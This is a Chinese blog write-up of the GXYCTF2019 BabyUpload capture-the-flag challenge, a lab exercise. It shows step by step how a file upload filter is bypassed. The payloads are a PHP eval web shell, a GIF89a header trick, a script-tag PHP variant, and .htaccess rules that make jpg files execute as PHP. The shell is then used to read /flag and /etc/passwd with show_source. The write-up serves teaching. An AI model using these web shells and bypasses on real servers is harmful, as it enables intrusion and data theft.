BUUCTF——[GXYCTF2019]BabyUpload

50 篇文章 4 订阅
17 篇文章 1 订阅
参赛者在GXYCTF2019中解决BabyUpload挑战,通过逐步上传和绕过限制,最终利用.htaccess实现PHP脚本执行并获取shell。过程中涉及文件类型检测、PHP版本控制和函数利用等技巧。
摘要由CSDN通过智能技术生成

BUUCTF——[GXYCTF2019]BabyUpload

1.上传嘛,直接丢正常的jpg文件进服务器
在这里插入图片描述
2.发现可以正常上传,并且回显出来啦文件上传的路径
/var/www/html/upload/7df22610744ec51e9cb7a8a8eb674374/1111.jpg

3.尝试上传一句话木马

<?php @eval($POST[123456]);?>

在这里插入图片描述

4.通过上面的回显可以看出来,检测到了php文件,尝试文件头进行绕过

GIF89a

<?php @eval($POST[123456]);?>

在这里插入图片描述

5.还是不得行,推测使用了<?php标签进行检测,尝试绕过
GIF89a
<script language="php">eval($_REQUEST[8])</script>

在这里插入图片描述

6.发现可以成功上传,尝试修改后缀名php,php3,php5,phtml
在这里插入图片描述

7.发现后缀名不能有ph,中间还尝试php%00,发现php版本过高不得行,发现可以上传.user.ini,尝试.user.ini绕过

auto_prepend_file=555.jpg

在这里插入图片描述
8.发现是可以上传的,但是呢无法解析,后面试了.htaccess发现可以,使用.htaccess可以成功getshell

.htaccess文件内容

SetHandler application/x-httpd-php

在这里插入图片描述

9.上传文件,文件内容为

GIF89a
<script language="php">eval($_REQUEST[8])</script>

在这里插入图片描述

10.成功getshell
在这里插入图片描述

11.蚁剑死活连接不上,太致命啦,重启了靶机,重新上传.htaccess

<FilesMatch "jpg">

  SetHandler application/x-httpd-php

</FilesMatch>

在这里插入图片描述

12.重新上传木马文件,还是连接不上

GIF89a
<script language="php">eval($_REQUEST[8])</script>

在这里插入图片描述

13.通过报错信息,发现禁用了系统函数
在这里插入图片描述
14.只能另辟蹊径啦,使用其他函数
show_source()函数

8=show_source('/flag',false);

在这里插入图片描述

15.成功读取文件信息

8=show_source('/etc/passwd',false);

在这里插入图片描述
在这里插入图片描述

  • 6
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值